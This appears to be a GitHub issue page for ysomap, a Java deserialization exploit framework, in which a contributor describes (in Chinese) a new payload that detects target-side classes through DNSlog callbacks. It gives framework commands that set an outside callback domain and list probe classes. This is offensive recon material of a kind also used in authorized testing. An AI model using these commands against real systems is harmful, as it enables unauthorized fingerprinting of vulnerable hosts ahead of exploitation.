wh1t3p1g / ysomap

A helpful Java Deserialization exploit framework.
Apache License 2.0
1.17k stars 150 forks source link

添加通过dnslog探测类 #45

Closed Ar3h closed 1 year ago

Ar3h commented 1 year ago

用法一:使用默认的探测 use payload DetectClass use bullet DetectClassBullet set domain xxx.eyes.sh run

用法二:自定义探测类以及回显的域名 set domain xxx.eyes.sh set param linux:com.sun.security.auth.module.UnixSystem;becl:com.sun.org.apache.bcel.internal.util.ClassLoader run